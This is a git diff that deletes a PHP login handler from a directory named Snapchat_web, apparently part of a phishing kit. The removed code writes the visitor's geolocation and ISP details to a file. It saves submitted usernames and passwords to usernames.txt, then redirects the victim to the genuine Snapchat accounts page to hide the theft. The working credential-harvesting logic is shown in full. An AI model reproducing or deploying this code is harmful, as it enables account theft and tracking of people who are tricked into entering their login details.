diff --git a/WebPages/Snapchat_web/login.php b/WebPages/Snapchat_web/login.php deleted file mode 100644 index 3a1f6cf..0000000 --- a/WebPages/Snapchat_web/login.php +++ /dev/null @@ -1,54 +0,0 @@ -loc.' [6]ISP = ' // latitude, longitude - .$details->org.' [7]CITY = ' // internet service provider - .$details->city.' [8]STATE = ' // city - .$details->region.' [9]COUNTRY = ' // state - .$details->country.' [10]DATE & TIME = ' // country - .date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date - ."\n" - ; - $write = fputs($fileHandle, $string); - @ fclose($fileHandle); - } - - -$var = $_POST['username']; -$var2 = $_POST['password']; -$myFile = file_get_contents("protect.html"); -$searchString = "WELCOME"; -if($myFile != $searchString) { - file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND); - header('Location:https://accounts.snapchat.com'); -} -if($myFile != $searchString) { - echo "LOGIN SUCCESSFULL"; - header('Location:https://accounts.snapchat.com'); -} -exit(); -?>